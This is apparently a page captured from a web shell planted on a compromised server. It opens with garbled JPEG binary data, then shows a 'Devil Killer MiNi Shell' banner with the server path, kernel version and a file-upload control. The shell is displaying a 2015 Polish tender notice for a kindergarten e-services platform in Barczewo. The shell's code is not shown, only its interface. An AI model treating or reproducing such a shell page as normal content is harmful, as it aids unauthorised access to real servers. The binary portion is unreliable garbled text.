JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150202/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150202/22742-N-2015.html

<p class="kh_header"><b>Barczewo: Innowacyjne e-przedszkole - utworzenie platformy e-usług publicznych oraz systemu back-office w Przedszkolu Miejskim</b><br>
<b>Numer ogłoszenia: 22742 - 2015; data zamieszczenia: 02.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Miejskie w Barczewie , ul. Słowackiego 7, 11-010 Barczewo, woj. warmińsko-mazurskie, tel. 89 5148396, faks 89 5148396.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przedszkolebarczewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Innowacyjne e-przedszkole - utworzenie platformy e-usług publicznych oraz systemu back-office w Przedszkolu Miejskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup, dostawa i montaż urządzeń służących uruchomieniu systemu e-przedszkole. Ponadto przedmiot zamówienia obejmuje wykonanie systemu okablowania strukturalnego, adaptację pomieszczenia serwerowni a także usługę zakupu, dostawy i wdrożenia oprogramowania dotyczącego zintegrowanego systemu informatycznego e-przedszkole. Szczegółowo opisany przedmiot zamówienia zawarty jest w Dokumentacjach technicznych (zał. nr 11, 12 i 13 do siwz). A. Obszar realizacji prac związanych z budową systemu informatycznego obejmuje miasto Barczewo. B. Zakres prac obejmuje: 1.Prace adaptacyjne serwerowi Przedszkola Miejskiego w Barczewie - szczegółowy zakres robót znajduje się w dokumentacji technicznej (załącznik nr 13 do siwz). 2.Wykonanie okablowania sieciowego Przedszkola Miejskiego w Barczewie - szczegółowy zakres robót znajduje się w dokumentacji technicznej (załącznik nr 13 do siwz). 3. Wprowadzenie i uruchomienie systemu e-przedszkole - szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 12 do siwz. 4. Zakup, dostarczenie, zamontowanie, skonfigurowanie, migracja danych, szkolenie pracowników oraz uruchomienia  sprzętu oraz oprogramowania, w ramach którego przewiduje się zakup: komputerów przenośnych dla Przedszkola Miejskiego w Barczewie wraz z oprogramowaniem (14 szt.); kolorowego urządzenia wielofunkcyjnego (1 szt.), drukarki kolorowe (3 szt.); czytnika kart identyfikacyjnych (1 szt.), kart identyfikacyjnych dla rodziców i dla pracowników (300 szt.); kamery cyfrowej (1 szt.); aparatu fotograficznego (2 szt.); monitora LCD (1 szt.) wraz z komputerem sterującym, Serwera wraz z szafa Rack (1 kpl.); Firewall brzegowy (1 szt.); urządzenia do archiwizacji (1 szt.); zasilacz awaryjny UPS do serwera (1 szt.); systemu operacyjnego do serwera oraz licencji dostępowych dla użytkowników (1 szt.) - szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 11 do siwz,. Celem projektu jest wdrożenie usług on-line poprzez utworzenie Platformy e-Usług Publicznych (e-ogłoszenia, e-informacja, e-zebranie, e-kontakt, e-obecność, e-należność) w Przedszkolu Miejskim w Barczewie. Projekt ma na celu przygotowanie Przedszkola Miejskiego w Barczewie do przyjmowania i realizacji spraw zainicjowanych drogą elektroniczną, w tym do realizacji nowoczesnych funkcji informatycznych na rzecz instytucji, podmiotów gospodarczych oraz mieszkańców. Zakres prac obejmuje: prace adaptacyjne serwerowi przedszkola Miejskiego w Barczewie - szczegółowy zakres robót znajduje się w dokumentacji technicznej (załącznik nr 13 do siwz) oraz wykonanie okablowania sieciowego Przedszkola Miejskiego w Barczewie - szczegółowy zakres robót znajduje się w dokumentacji technicznej (załącznik nr 13 do siwz) Na przedmiot zamówienia składają się następujące urządzenia, sprzęt i oprogramowanie: Zakup licencji (1 kpl.): e-ogłoszenia, e-informacja, e-zebranie, e-kontakt, e-obecność, e-należność; Wdrożenie e-usług - 1 kpl.;Stworzenie portalu informatycznego Przedszkola Miejskiego w Barczewie ;Wymagania dotyczące oprogramowania: System musi zostać w pełni napisany za pomocą kodu otwartego, w technologiach Opensource. Preferowane wykorzystanie języka programowania PHP, baz danych MySQL oraz frameworków Zend/Symfony2. Wymogiem koniecznym jest przekazanie kodów źródłowych całego przedmiotu zamówienia, 
wraz z przekazaniem praw autorskich majątkowych oraz umożliwieniem przez zamawiającego dowolnych modyfikacji przedmiotu zamówienia. Wyklucza się wykorzystania technologii zamkniętych, elementów systemu w których kod źródłowy nie podlega dowolnym modyfikacjom. Aplikacja/wdrożenie mają mieć charakter dedykowany : muszą zostać wykorzystane istniejące elementy graficzne, logotypy, czcionki. Wszystkie usługi dostępne jako subdomeny dla przedszkole.barczewo.pl. Wymagania w zakresie wdrożenia. Wykonawca przekaże prawa autorskie majątkowe wyspecyfikowanych modułów dla nieograniczonej liczby użytkowników. Wykonawca skonfiguruje dostarczoną platformę serwerową pod kątem wdrożenia wyspecyfikowanych modułów. Wykonawca zainstaluje wszystkie wymagane komponenty(w tym systemy operacyjne, bazodanowe) niezbędne do poprawnego funkcjonowania wyspecyfikowanych modułów. Wykonawca przeszkoli użytkowników oraz administratora wdrażanych rozwiązań. Wykonawca przeznaczy łącznie nie mniej niż 180 godzin wdrożeniowych/szkoleniowych na realizację projektu w zakresie opisanych modułów. Wymagania w zakresie szkoleń: Wykonawca przeszkoli użytkowników z zamawianych modułów. Szkolenia z systemów dziedzinowych muszą być realizowane w formie instruktarzy stanowiskowych bezpośrednio na stanowiskach pracy użytkowników. Szkolenie z pozostałych modułów mogą być realizowane w grupach max 3 osobowych przy stanowiskach komputerowych dostarczonych przez Wykonawcę (w formie mobilnej sali szkoleniowej). Odpowiednie pomieszczenie zapewni Zamawiający. C. W przypadku gdy w dokumentacji technicznej wskazano konkretnych producentów materiałów i urządzeń celem rzetelnego opracowania projektu, umożliwiając jego jednoznaczne odczytanie (zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 03.07.2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego - Dz. U. Nr 120, poz. 1133 ze zm.), Zamawiający dopuszcza przyjęcie innych - równoważnych materiałów i urządzeń niż zaprojektowane, przy czym równoważne oznacza zastosowanie materiałów i urządzeń mających parametry takie jak przyjęte w obliczeniach lub pokazane na rysunkach, muszą też posiadać aktualne certyfikaty i aprobaty techniczne. Wykazanie równoważności zastosowanych rozwiązań z przedmiotem zamówienia (zgodnie z art.30 ust. 5 Pzp) spoczywa na Wykonawcy. D. Wymagania dotyczące sprzętu, urządzeń oraz oprogramowania: 1. Oferowany przez Wykonawcę sprzęt, urządzenia oraz oprogramowanie muszą być fabrycznie nowe, tzn. wyprodukowane nie dawniej niż na 6 miesięcy przed ich dostarczeniem, nie podlegały refabrykacji oraz były nieużywane. 2. Podane w opisie przedmiotu zamówienia parametry są parametrami minimalnymi sprzętu. 3. Oferowane oprogramowanie jest oprogramowaniem w wersji aktualnej (tzn. opublikowanej przez producenta nie wcześniej niż 6 miesięcy lub w najnowszej wersji stabilnej jeśli zostało opublikowane wcześniej niż 6 miesięcy) na dzień poprzedzający dzień składania ofert. 4. Wykonawca wraz ze sprzętem i urządzeniami dostarczy listę numerów seryjnych dostarczonych urządzeń (o ile posiadają takie numery). 5. Wykonawca ponosi odpowiedzialność za wszelkie braki i wady przedmiotu zamówienia, w tym za uszkodzenia powstałe w czasie transportu. 6. Wykonawca przekaże Zamawiającemu gwarancje producentów na dostarczony sprzęt oraz urządzenia, na okres minimum 24 miesięcy (2 lat). 7. W przypadku, gdy dany sprzęt lub urządzenie nie posiada gwarancji producenta, Wykonawca zobowiązuje się objąć ją 24 miesięcznym (2 letnim) okresem gwarancji. 7. Wykonawca zobowiązuje się przekazać Zamawiającemu dokument gwarancyjny w dniu odbioru przedmiotu dostawy. Dokument ten winien określić warunki serwisowania gwarancyjnego, pogwarancyjnego, wykaz punktów serwisowych, okres gwarancji, terminy usunięcia stwierdzonych wad i usterek, a także wskazywać całość świadczeń gwaranta na rzecz zamawiającego. 8.Sprzęt i urządzenia wymienione w załącznikach nr 8 i 9 muszą spełniać określone innymi przepisami wymogi jakościowe i bezpieczeństwa (muszą posiadać oznakowanie CE). 9.Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek znaki towarowe, patent czy pochodzenie lub też wskazano konkretnych producentów, należy przyjąć, iż Zamawiający podał taki opis ze wskazaniem na typ sprzętu oraz pomocy i ma to na celu określenie cech technicznych i jakościowych. Powyższe nie stanowi utrudnienia uczciwej konkurencji w rozumieniu art. 29 ust. 2 ustawy Prawo zamówień publicznych. Zamawiający dopuszcza złożenie w ofercie sprzętu i urządzeń równoważnych tj. zawierających odpowiedniki, o parametrach techniczno - eksploatacyjno - użytkowych nie niższych pod względem jakości i parametrów technicznych niż produkty wskazane przez Zamawiającego. Podstawa prawna: art. 29 ust. 3 Pzp. 10. Wykazanie równoważności z przedmiotem zamówienia (zgodnie z art.30 ust. 5 Pzp) spoczywa na Wykonawcy, który jest zobowiązany wykazać, że oferowany sprzęt, urządzenia oraz oprogramowanie spełniają wymagania określone przez Zamawiającego. W związku z powyższym Zamawiający wymaga załączenia dokumentów potwierdzających, iż oferta równoważna spełnia żądane parametry. 11. Zaoferowanie sprzętu, urządzeń i oprogramowania niezgodnych z opisem przedmiotu zamówienia zawartym w niniejszym rozdziale oraz w załącznikach do siwz, skutkować będzie odrzuceniem oferty na podstawie art. 89 ust.1 pkt. 2 ustawy Pzp. E. Zadanie inwestycyjne realizowane jest w ramach projektu Innowacyjne e-przedszkole - utworzenie platformy e-usług publicznych oraz systemu back-office w Przedszkolu Miejskim w Barczewie dofinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013 Oś priorytetowa 7 Infrastruktura społeczeństwa informacyjnego, Działanie 7.2 Promocja i ułatwianie dostępu do usług teleinformatycznych, Poddziałanie 7.2.1 Usługi i aplikacje dla obywateli. Przedszkole Miejskie w Barczewie realizuje nowatorski projekt, który pozwoli wdrożyć e-usługi ukierunkowane na obsługę obywateli, pracowników, rodziców i podmioty zaangażowane w system edukacji. W ramach projektu zostaną zrealizowane następujące zadania: a. zbudowanie i wdrożenie systemu e-usług skierowanych do obywateli, b. rozbudowa infrastruktury technicznej przedszkola Miejskiego w Barczewie w celu poprawy jakości obsługi. Głównym celem projektu jest uruchomienie systemu informacyjnego e-przedszkole, zawierającego: - informacje o sposobie załatwienia spraw związanych z pobytem dziecka w przedszkolu, - informacje związane z funkcjonowaniem jednostki, - przewodnik dotyczący naliczania opłat za pobyt dziecka w przedszkolu. System e-przedszkole umożliwi również wypełnienie i wydrukowanie niezbędnych formularzy np.: formularza o przyjęcie dziecka do przedszkola oraz zapewni bezpośrednią i szybką komunikację z przedszkolem Miejskim. System e-przedszkole pełnić będzie także rolę systemu zarządzania treścią danych elektronicznych (CMS - Content Menagement System). Pozwoli on na scalenie i ogarnięcie w skali całego Przedszkola dużych ilości rozproszonych, przetwarzanych treści. Wynikowo nastąpi sprawne wyszukiwanie danych i prezentacja treści w serwisach WWW Przedszkola Miejskiego i portalu integracyjnym on-line. Portal będzie zintegrowany z obecnym systemem informacyjnym WWW oraz Biuletynem Informacji Publicznej i stanowić będą razem integracyjny portal on-line, w ramach którego rodzice będą mogli uzyskiwać kompleksowe informacje, realizować sprawy w sposób elektroniczny. W ramach realizacji projektu zakupiony zostanie monitor LCD, na którym prezentowane będą sprawy bieżące Przedszkola Miejskiego, najważniejsze ogłoszenia, jak również informacje na temat możliwości oferowanych przez system e-przedszkole. W wyniku wprowadzenia systemu e-przedszkole zostanie utworzona sprawna organizacja wewnętrzna, nastąpi wymiana informacji oraz e-obieg dokumentów (back-office). Zostanie również stworzony system informatyczny, którego celem będzie osiągnięcie sprawnej obsługi klientów (front -office). System e-przedszkole zachowa ponadto bezpieczeństwo użytkowników, spójność danych oraz udostępni usługi, które są trudne do realizacji w przypadku tradycyjnych aplikacji instalowanych na komputerach użytkowników. Celem budowy serwisu jest udostępnienie serwisu rodzicom i jednostkom publicznym oraz stworzenie możliwości zaistnienia nowym firmom w Internecie. Grupa docelowa do której kierowany jest serwis to: rodzice dzieci w wieku przedszkolnym, instytucje edukacyjne, instytucje samorządowe oraz pracownicy Przedszkola Miejskiego w Barczewie. F. Realizowany zakres przedmiotu zamówienia ma zapewnić prawidłowe funkcjonowanie systemu informatycznego, a także ma na celu spełnienie przez Zamawiającego wszystkich warunków określonych ramami umowy o dofinansowanie, zawartej z Instytucją Zarządzającą Regionalnym Programem Operacyjnym Warmia i Mazury 2007-2013. G. Wycena oferty winna być poprzedzona wizją lokalną i powinna uwzględniać wszystkie koszty i czynności, niezbędne do wykonania przedmiotu zamówienia zgodnie z prawem i najlepszą wiedzą techniczną. Wykonawca ma możliwość dokonania oględzin miejsca realizacji przedmiotu zamówienia i rozpoznania wszelkich uwarunkowań, które mogą mieć wpływ na przyszły proces realizacji zadania i podaną w ofercie cenę. UWAGA (zalecenie): Zamawiający zaleca Wykonawcom dokonanie wizji lokalnej celem zapoznania się z zakresem niniejszego zamówienia publicznego oraz uzyskania wszelkich dodatkowych informacji, koniecznych do oceny zakresu realizowanych prac. Z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do realizacji umowy przez Wykonawcę, Zamawiający nie będzie dokonywał żadnych dodatkowych płatności i zamówień. Koszt wizji lokalnej ponosi Wykonawca. Adres: gmina Barczewo, powiat olsztyński - osoba do kontaktu: Dorota Mikołajczuk - tel. 89 514 83 96 H. Wymagania dotyczące robót budowlano - montażowych: 1. Wykonawca jest odpowiedzialny za jakość wykonanych robót, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia, według zatwierdzonych dokumentacji technicznych, specyfikacji technicznych wykonania i odbioru robót, przedmiarami robót, podpisaną umową między Zamawiającym a Wykonawcą, zgodnie z obowiązującym prawem, normami, zasadami wiedzy technicznej i sztuką budowlaną. 2. Wymagana jest należyta staranność przy realizacji zobowiązań wynikających z postanowień umowy. Wykonawca jest zobowiązany do: 1. Sporządzenia planu bezpieczeństwa i ochrony zdrowia (Planu BIOZ). 2. Dokonywania przy udziale lub z upoważnienia Zamawiającego niezbędnych zawiadomień i zgłoszeń. 3. Sporządzenia kosztorysu powykonawczego na zakończenie robót i dostarczenie go wraz z fakturą końcową. 4. Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy. 5. Określenie przez Wykonawcę telefonów kontaktowych i numerów fax oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zmówienia. 6. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia. 7. Realizacja zadania podlega prawu polskiemu, w tym w szczególności Ustawie z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2006 Nr 156, poz. 1118, ze zm.). 8. Wykonawca ponosi odpowiedzialność za zapoznanie się z należytą starannością z treścią dokumentacji przetargowej oraz za uzyskanie wiarygodnej informacji odnośnie warunków i zobowiązań, które w jakikolwiek sposób mogą wpłynąć na wartość lub charakter Oferty lub realizację robót oraz dostaw. 9. Wykonawca dokonuje wyceny oferty na własne ryzyko i odpowiedzialność. 10.Wykonawca ponosi wszystkie koszty związane z przygotowaniem i przedłożeniem swojej oferty oraz wszelkich dokumentów z tym związanych. 11. Wykonawca jest zobowiązany wykonać pełen zakres robót, który jest konieczny z punktu widzenia dokumentacji, przepisów prawa, wiedzy technicznej i sztuki budowlanej, dla uzyskania końcowego efektu określonego przez przedmiot zamówienia, a więc wykonać zadanie bez względu na występujące trudności i nieprzewidziane okoliczności, jakie mogą wystąpić w trakcie realizacji. 12. Zamawiający zapewnia na swój koszt nadzór autorski autora dokumentacji projektowej na podstawie odrębnie zawartej umowy. 13. Zamawiający zwraca szczególną uwagę Wykonawcy na: - uzgadnianie prowadzenia robót z gestorami sieci, - konieczność utylizacji odpadów zgodnie z ustawą o odpadach, - sporządzanie ekspertyz i opracowań, których potrzeba ujawni się w trakcie realizacji prac, - uzgadnianie zajęcia terenu na czas prowadzenia robót z prawnymi użytkownikami terenu. 14. W trakcie wykonywania robót Wykonawca jest zobowiązany do: a. wykonania robót pomocniczych, przygotowawczych i porządkowych oraz naprawy ewentualnych uszkodzeń; b. wykonania niezbędnych pomiarów, badań i sprawdzeń; c. zainstalowania urządzeń, dokonania ich rozruchu, przeszkolenia personelu Zamawiającego w zakresie obsługi i eksploatacji instalacji na etapie rozruchu; d. dobór materiałów i szczegółowe rozwiązania projektowe wymagają każdorazowo zatwierdzenia przez Inwestora; e. przeprowadzenia wymaganych prób i badań, opracowania świadectwa charakterystyki energetycznej dla sieci oraz dokumentacji powykonawczej. 15. Wymagania dotyczące przedmiotu zamówienia: 1) przy wykonywaniu robót należy stosować wyroby, które zostały dopuszczone do obrotu oraz powszechnego lub jednostkowego stosowania w budownictwie, zgodnie z przepisami ustawy z 16 kwietnia 2004 r. o wyrobach budowlanych (Dz.U.04.92.881 ze zm.). Wszystkie niezbędne elementy powinny być wykonane w standardzie i zgodnie z obowiązującymi normami, 2) Wszystkie komponenty systemu okablowania muszą być zgodne z wymaganiami obowiązujących norm: a. PN-EN-50173-1:2007 lub równoważnej, b. ISO/IEC 11801:2002/Am1:2008+Am2:2010 lub równoważnej, c. IEC 61156-5:2002 lub równoważnej, 3) Wszystkie komponenty systemu okablowania strukturalnego muszą być wykonane w procesie, którego jakość została potwierdzona certyfikatem ISO 9001 lub równoważnym, a moduły gniazda RJ45, kabla S/FTP i kable krosowe muszą posiadać certyfikat GHMT Premium Verification Program lub równoważny. 4) roboty należy prowadzić pod stałym nadzorem technicznym, z zachowaniem obowiązujących przepisów, w tym: bhp i przeciwpożarowych, zgodnie z wymaganiami obowiązującego prawa budowlanego, 5) pokrycia przez Wykonawcę kosztów poboru energii elektrycznej zużytej podczas prowadzonych robót, 6) obowiązkiem Wykonawcy jest utrzymanie porządku i ochrony mienia znajdującego się na terenie budowy i terenach przyległych, Wykonawca zobowiązany jest utrzymać teren budowy w stanie wolnym od przeszkód komunikacyjnych oraz usuwać na bieżąco zbędne materiały, odpady i śmieci oraz ponieść koszty z tym związane. Wykonawca jest zobowiązany do naprawy wszelkich uszkodzeń powstałych w obrębie placu budowy w okresie od dnia przekazania placu budowy Wykonawcy do dnia uzyskania pozwolenia na użytkowanie, 7) Wykonawca jest zobowiązany sporządzić instrukcję obsługi i konserwacji urządzeń, 8) dla nowych urządzeń tego wymagających Wykonawca ma obowiązek dostarczyć komplet sprzętu, oznakowań, instrukcji, środków ochrony indywidualnej i zbiorowej z zakresu bhp i ochrony przeciwpożarowej, wymaganych przepisami szczegółowymi, 9) Wykonawca jest zobowiązany oznakować budynek i instalacje zgodnie z wymaganiami przepisów szczegółowych, a w szczególności: miejsce lokalizacji sprzętu p.poż., urządzeń, instalacji, miejsca występowania zagrożeń i ograniczeń w zakresie przebywania i komunikacji, oznakowania informacyjne w zakresie pomieszczeń i komunikacji...</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.23.13.00-0, 30.21.31.00-6, 32.00.00.00-3, 32.40.00.00-7, 45.30.00.00-0, 48.00.00.00-8, 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania, wykonawca jest zobowiązany wnieść wadium w wysokości 7 000,00 zł. (słownie: siedem tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potrzeby wykonania przedmiotu zamówienia nie wymaga się posiadania specjalnych uprawnień. Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Pzp. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku tj. złożenia oświadczenia o spełnieniu warunku, spowoduje wykluczenie z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Pzp. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku tj. złożenia oświadczenia o spełnieniu warunku, spowoduje wykluczenie z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Pzp. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku tj. złożenia oświadczenia o spełnieniu warunku, spowoduje wykluczenie z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda aby Wykonawca dysponował odpowiednio wykwalifikowanym personelu w tym: Kierownik Projektu  (1 osoba), spełniający następujące wymagania: wykształcenie wyższe, minimum 3 letnie doświadczenie w kierowaniu projektami związanymi z informatyzacją w jednostkach administracji publicznej, Architekt  systemów informatycznych (1 osoba):posiada wykształcenie wyższe informatyczne, posiada minimum 3 lata doświadczenia zawodowego w branży związanej z informatyzacją jednostek administracji publicznej. Specjalista ds. integracji  systemów informatycznych (1 osoba):posiada wykształcenie wyższe informatyczne, posiada minimum 2 lata doświadczenia zawodowego w branży związanej z informatyzacją jednostek administracji publicznej Kierownik zespołu wdrożeniowego  (1 osoba):posiada wykształcenie wyższe, posiada minimum 2 lata doświadczenia zawodowego w branży informatycznej na stanowisku związanym z zarządzaniem projektami wdrożeniowymi lub zespołami wdrożeniowymi, Zamawiający dopuszcza łączenie w/w funkcji. Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Pzp i wykazaniu się dysponowania osobami do wykonania zamówienia. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku tj. złożenia oświadczenia o spełnieniu warunku i wykazaniu osób do wykonania zamówienia, spowoduje wykluczenie z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
